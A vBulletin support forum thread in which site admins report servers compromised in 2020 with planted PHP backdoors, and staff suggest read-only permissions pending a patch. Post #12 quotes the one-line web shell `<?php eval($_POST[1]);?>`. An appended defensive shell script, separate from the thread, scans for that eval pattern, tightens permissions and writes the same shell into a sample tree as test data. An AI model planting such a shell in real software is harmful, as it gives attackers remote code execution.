  • Known Exploit Warning Question

    This morning I received the scan results on my server with a:

    '/home/*******/public_html/forums/web.php'
    Known exploit = [Fingerprint Match] [PHP Shell Exploit [P1747]]

    Indicating I have some type of issue. It was recommended that I replace the web.php file. That is fine but I don't know what this file does or where another copy of it would be.

    I am running vBulletin 5.6.2, PHP 7.1.33, MySQL 5.7.31-log.

    I know I have an update on my desk that needs to be done and was going to work on that today. Will that take care of this issue or do I have a bigger fish to fry somewhere? Thanks in advance for the assistance.

  • #2
    It looks like there are two instances in 5.6.1 PL1

    /core/vb/request

    /core/vb/session



    • #3
      Our team is looking into this issue. There is no "web.php" file included with vBulletin. You can see all suspect files by going into the AdminCP and visiting Maintenance -> Diagnostics. Making your vBulletin directory read only will prevent people from trying to write to the directory while we investigate.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API - Full / Mobile
      Vote for your favorite feature requests and the bugs you want to see fixed.



      • #4
        Well at least in 5.5.5 there are 2 web.php in vb:

        /upload/core/vb/request
        /upload/core/vb/session

        as mentioned already.

        They do not exist in 5.6.3 alpha4
        Paul M. 14.12.2012: You already know vB4 isnt being worked on atm, so of course no bugs are going to have been fixed in the last few months, nor are they going to get fixed "now".



        • #5
          My site was also compromised this morning at 6:35 AM GMT-7. The file is named 1.php and was placed in the root of the site. Windows Defender identified the exploit as Backdoor:PHP/Shell.Q
          https://www.microsoft.com/en-us/wdsi...tid=2147682386

          I've zipped up the file and attached here as Backdoor.zip.
          Last edited by Wayne Luke; Mon 10 Aug '20, 10:32am.
          VB 5.6.3
          PHP 7.4
          MySQL 5.7.24



          • #6
            I've removed the attachment. It really is meaningless to post it. The developers are working on a solution.


            • OrganForum
              OK, thought it would be useful for solving the issue.

          • #7
            Originally posted by Niktator View Post
            Well at least in 5.5.5 there are 2 web.php in vb:
            I stand corrected. However, 5.5.5 is outside the supported range of vBulletin releases. We currently support the latest release and two versions back. vBulletin 5.5.5 will not receive any updates we release after investigation.



            • #8
              Originally posted by Wayne Luke View Post

              I stand corrected. However, 5.5.5 is outside the supported range of vBulletin releases. We currently support the latest release and two versions back. vBulletin 5.5.5 will not receive any updates we release after investigation.
              I know. But this explains why some users got the web.php in their install. Telling users there is no web.php is a bit more confusing than saying "we had a web.php in older versions"....

              Waiting for "the solution" and even more for a list of affected versions.


              • #9
                I got hacked at noon (CST) today -- was on 5-6-1 Patch Level 1.

                Have upgraded to 5-6-2. Can provide http access and error logs to Wayne Luke if you guys need help determining the attack vector.



                • #10
                  We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).


                  • holymannn
                    All directories to 444? From /forum and its sub folders?

                • #11
                  Originally posted by Wayne Luke View Post
                  We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).
                  Perfect. Done.



                  • #12
                    I found the files hax.php at these locations:

                    includes/vb5/template/cache/hax.php
                    includes/vb5/template/bbcode/hax.php

                    code is:
                    Code:
                    <?php eval($_POST[1]);?>


                    • #13
                      They could be anywhere in the system. Make your file system read only so the webserver cannot write to it.

                      Use the suspect files diagnostic to delete files and directories not part of vBulletin and that you did not place on the server yourself.


                      • #14
                        My 5.6.1 site was hit and I cannot access either URL. I have 444'd it.

                        My 5.6.2 sites appear unaffected.
                        Last edited by NumNum; Mon 10 Aug '20, 12:35pm.
                        adktramping ~ my happy place.

                        "Whoever said practice makes perfect was an idiot. Humans can't be perfect because we're not machines." ~ Sam Gardner.

                        Vote for your favorite feature requests and the bugs you want to see fixed.



                        • OrganForum
                          I was running 5.6.2 when exploited. This forum, forum.vbulletin.com, was down for maintenance this morning. I assume it was also exploited and all version 5.x.x are vulnerable.

                        • NumNum
                          Thank you for verifying.

                      • #15
                        Originally posted by Wayne Luke View Post
                        We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).
                        I spoke too soon. Chmod 444 on the vbulletin root directory causes an issue with .htaccess not being readable (weird considering it IS readable with 444). I can work through that, but for me it wasn't as simple as setting 444.



                        • OrganForum
                          I think .htaccess needs to be executable as well as readable. Encountered the same problem with 444.

                          chmod 555 works.
                          I've closed my forum until a patch is ready.

                        • NumNum
                          What issue did you have? My site won't read my .htaccess and its permissions are 644.
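An added example, not vBulletin's code and not from anyone in this thread, that ties together the hax.php finding in #12, the "delete what isn't vBulletin's" advice in #13 and the 444-vs-555 discussion under #15: it greps a web root for the request-fed eval() shape of hax.php, lists world-writable directories (a simplification standing in for "writable by the web server's user"), and applies 555 to directories and 444 to files, because a directory's execute bit is its search permission and without it Apache cannot open the .htaccess inside. The sample tree, paths and file contents are constructed.

```shell
#!/bin/sh
# Added example (not vBulletin's code, not from anyone in the thread).
# Paths, file contents and the sample tree below are constructed.

# PHP files under $1 whose eval() is fed from a request superglobal
# (the hax.php shape: <?php eval($_POST[1]);?>) or from base64_decode().
find_webshells() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        'eval[[:space:]]*\([[:space:]]*(\$_(POST|GET|REQUEST|COOKIE)|base64_decode)' \
        {} + 2>/dev/null | sort
}

# Directories under $1 that any user can write to. Simplification: what matters
# is whether the web server's user can write there; world-writable is the crudest case.
find_writable_dirs() {
    find "$1" -type d -perm -0002 | sort
}

# The thread's read-only workaround, with 555 (not 444) on directories: the
# execute bit is the directory search permission, and without it the web
# server cannot open the .htaccess (or anything else) inside that directory.
lockdown() {
    find "$1" -type d -exec chmod 555 {} +
    find "$1" -type f -exec chmod 444 {} +
}

# Permission string such as dr-xr-xr-x, read from ls (portable across stat variants).
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Constructed web root: one planted shell, one benign file, one .htaccess,
# and a world-writable template cache directory like the one in #12.
make_sample_root() {
    umask 022
    root=$(mktemp -d)
    mkdir -p "$root/includes/vb5/template/cache" "$root/core"
    printf '<?php eval($_POST[1]);?>\n' > "$root/includes/vb5/template/cache/hax.php"
    printf '<?php echo "hello";\n' > "$root/core/index.php"
    printf 'RewriteEngine On\n' > "$root/.htaccess"
    chmod 777 "$root/includes/vb5/template/cache"
    echo "$root"
}

# Restore write access and delete the sample tree.
cleanup() {
    chmod -R u+w "$1" && rm -rf "$1"
}
```

Run `find_webshells` and `find_writable_dirs` against a real web root before `lockdown`, and review every hit against the AdminCP suspect-files diagnostic rather than deleting blindly.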
